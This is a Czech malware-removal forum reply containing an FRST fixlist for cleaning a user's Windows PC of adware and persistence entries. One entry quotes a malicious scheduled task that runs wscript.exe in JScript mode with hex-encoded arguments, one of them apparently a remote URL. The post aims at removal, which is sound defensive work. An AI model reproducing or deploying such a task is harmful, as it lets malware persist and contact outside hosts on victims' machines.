Otevřte poznámkový blok a zkopírujte do něj:
Start

CloseProcesses:
HKU\S-1-5-21-2055909378-1137603550-79369489-1001\...\MountPoints2: {045bcc95-b53d-11e8-8285-2c600c36c058} - "E:\HiSuiteDownLoader.exe"
HKU\S-1-5-21-2055909378-1137603550-79369489-1001\...\MountPoints2: {ae5fc0d7-fe1a-11e7-8278-2c600c36c058} - "E:\AutoRun.exe"
HKU\S-1-5-21-2055909378-1137603550-79369489-1001\...\MountPoints2: {d4408456-5472-11e9-8295-2c600c36c058} - "E:\HiSuiteDownLoader.exe"
ShortcutTarget: Odoslanie do aplikácie OneNote.lnk -> C:\Program Files (x86)\Microsoft Office\root\Office16\ONENOTEM.EXE (No File)
HKLM\SOFTWARE\Policies\Mozilla\Firefox: Restriction <==== ATTENTION
Task: {7B9D5FB0-3F73-4B71-8752-21BAFB8716B6} - System32\Tasks\ByteFence => C:\Program Files\ByteFence\ByteFence.exe <==== ATTENTION
Task: {AF48B60B-77CD-43BB-A274-95951EF57CA4} - System32\Tasks\GoogleUpdateTaskMachineUA => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [153168 2017-12-30] (Google Inc -> Google Inc.)
Task: {DFCB0507-7D66-4C4C-BA4E-49D464ACFEE3} - System32\Tasks\GoogleUpdateTaskMachineCore => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [153168 2017-12-30] (Google Inc -> Google Inc.)
Task: {F50A3388-AAED-4597-A11F-D36F90F62F32} - System32\Tasks\Chromium manit => "wscript.exe" "C:\ProgramData\{1212D771-9850-5DB7-1E96-C3F584D4483B}\cala.txt" "68747470733a2f2f6b6174756e61712e636f6d" "433a5c50726f6772616d446174615c7b31323132443737312d393835302d354442372d314539362d4333463538344434343833427d5c6c6566696361" "433a5c50726f6772616d446174615c7b31323132443737312d393835302d354442372d314539362d4333463538344434343833427d5c6c6974616d656c" "//B" "//E:jscript" "--IsErIk" -> "C:\ProgramData\{1212D771-9850-5DB7-1E96-C3F584D4483B}\cala.txt" "68747470733a2f2f6b6174756e61712e636f6d" "433a5c50726f6772616d446174615c7b31323132443737312d393835302d354442372d314539362d4333463538344434343833427d5c6c6566696361" "433a5c50726f6772616d446174615c7b31323132443737312d393835302d354442372d (the data entry has 84 more characters). <==== ATTENTION
R2 rtop; C:\Program Files\ByteFence\rtop\bin\rtop_svc.exe [297288 2018-04-10] (Byte Technologies LLC -> Byte Technologies LLC.) <==== ATTENTION
C:\Users\Alžbeta\AppData\Local\BIT4B2F.tmp
ShellIconOverlayIdentifiers: [ ACloudSynced] -> {5CCE71FA-9F61-4F24-9CD1-98D819B40D68} => -> No File
ShellIconOverlayIdentifiers: [00asw] -> {472083B0-C522-11CF-8763-00608CC02F24} => -> No File
ShellIconOverlayIdentifiers: [ACloudSyncedRF] -> {5CCE71FA-9F61-4F24-9CD1-98D819B40D68} => -> No File
ShellIconOverlayIdentifiers: [ACloudSyncedSF] -> {5D5F18B7-D59B-4B18-A3E9-0A4BDCCCB699} => C:\Program Files (x86)\Acer\Acer Portal\x64\shellext_win.dll -> No File
ContextMenuHandlers3: [ContextMenuShlExt] -> {08264889-8298-4B92-A6F2-6813E1BE356E} => C:\Program Files (x86)\Acer\Acer Portal\x64\shellext_win.dll -> No File
ContextMenuHandlers5: [igfxcui] -> {3AB1675A-CCFF-11D2-8B20-00A0C93CB1F4} => -> No File
SearchScopes: HKLM -> {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL =
SearchScopes: HKLM-x32 -> {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL =
SearchScopes: HKU\.DEFAULT -> DefaultScope {F82E2E2C-CD72-469D-87B5-1F7C6F1AB9CD} URL =
SearchScopes: HKU\.DEFAULT -> {e5badea7-e1c2-fbf1-87ac-061d1440d15b} URL =
SearchScopes: HKU\S-1-5-21-2055909378-1137603550-79369489-1001 -> DefaultScope {F82E2E2C-CD72-469D-87B5-1F7C6F1AB9CD} URL =
SearchScopes: HKU\S-1-5-21-2055909378-1137603550-79369489-1001 -> {e5badea7-e1c2-fbf1-87ac-061d1440d15b} URL =
SearchScopes: HKU\S-1-5-21-2055909378-1137603550-79369489-1001 -> {F82E2E2C-CD72-469D-87B5-1F7C6F1AB9CD} URL =
Handler: sacore - {5513F07E-936B-4E52-9B00-067394E91CC5} - c:\PROGRA~2\mcafee\SITEAD~1\mcieplg.dll No File
FirewallRules: [{9208E5BE-4E2A-4964-868A-FBA7DFB271BD}] => (Allow) C:\Program Files\Common Files\mcafee\platform\McSvcHost\McSvHost.exe => No File
FirewallRules: [{2817DD9A-31A9-420A-A06F-377D4B8323DB}] => (Allow) C:\Program Files (x86)\CyberLink\PowerDVD12\Kernel\DMR\PowerDVD12DMREngine.exe => No File
FirewallRules: [{3DA36FEE-2FBA-413E-989B-98AECE1AEBD8}] => (Allow) C:\Program Files (x86)\CyberLink\PowerDVD12\Kernel\DMS\CLMSServerPDVD12.exe => No File
FirewallRules: [{50D0DF4A-5879-49FC-A537-09FC294AA9AB}] => (Allow) C:\Program Files (x86)\CyberLink\PowerDVD12\PowerDVD12Agent.exe => No File
FirewallRules: [{92D1320A-03E7-40B0-B28C-041AB4188B8D}] => (Allow) C:\Program Files (x86)\Acer\abMedia\DMCDaemon.exe => No File
FirewallRules: [{F5D62F46-FA0F-4DAF-B4E5-DBB3A65AEF08}] => (Allow) C:\Program Files (x86)\Acer\abMedia\DMCDaemon.exe => No File
FirewallRules: [{AE3E6DAF-7213-447F-8C5C-31AECE94AEAC}] => (Allow) C:\Program Files (x86)\Acer\abMedia\WindowsUpnpMV.exe => No File
FirewallRules: [{CB8413FA-6C62-4A93-8C5C-8765FBA9868F}] => (Allow) C:\Program Files (x86)\Acer\abMedia\WindowsUpnpMV.exe => No File
FirewallRules: [{15687744-C365-443B-809C-2E07CA7237F0}] => (Allow) C:\Program Files (x86)\Acer\abMedia\DMCDaemon.exe => No File
FirewallRules: [{4861CB37-C9F1-4F57-BCCC-A0C61836DB64}] => (Allow) C:\Program Files (x86)\Acer\abMedia\DMCDaemon.exe => No File
FirewallRules: [{2548F8BD-3A37-4010-A432-C4F0FAACCFDF}] => (Allow) C:\Program Files (x86)\Acer\abMedia\WindowsUpnpMV.exe => No File
FirewallRules: [{3DCDB0AE-E13F-4C6E-9529-BE92F3DE06CA}] => (Allow) C:\Program Files (x86)\Acer\abMedia\WindowsUpnpMV.exe => No File
FirewallRules: [{5BA545F1-4951-4E9C-AE94-7E5477BDEFFA}] => (Allow) C:\Windows\system32\config\systemprofile\AppData\Local\Chromium\Application\chrome.exe => No File
FirewallRules: [{63F4D787-3106-4A04-8B8D-5A2755FB01FC}] => (Allow) C:\Users\Alžbeta\AppData\Roaming\Zoom\bin\airhost.exe => No File
FirewallRules: [{BB37EA80-FC62-4E5B-B932-3806691F7E30}] => (Allow) C:\Users\Alžbeta\AppData\Roaming\Zoom\bin\airhost.exe => No File

EmptyTemp:
Hosts:
End
Uložte do C:\install jako fixlist.txt. Spusťte znovu FRST a klikněte na >Fix<. Po skončení akce se objeví log, který sem zkopírujte.
Dotazy a logy vkládejte pouze do vašich threadů. Soukromé zprávy, icq a e-maily neslouží k řešení vašich problémů.

Podpořte, prosím, naše fórum : https://platba.viry.cz/payment/.

Navštivte: Obrázek

e-mail: rudy(zavináč)forum.viry.cz

Varování:
Před odvirováním PC si udělejte zálohy svých důležitých dat (pošta, kontakty, dokumenty, fotografie, videa, hudba apod.). Virus mimo svých "viditelných" aktivit může poškodit systém!


Po dořešení vašeho problému bude vlákno zamknuto. Stejně tak tehdy, pokud bude nečinné více než 14dnů. Pokud budete chtít vlákno aktivovat, napište mi na mail uvedený výše.

Odpovědět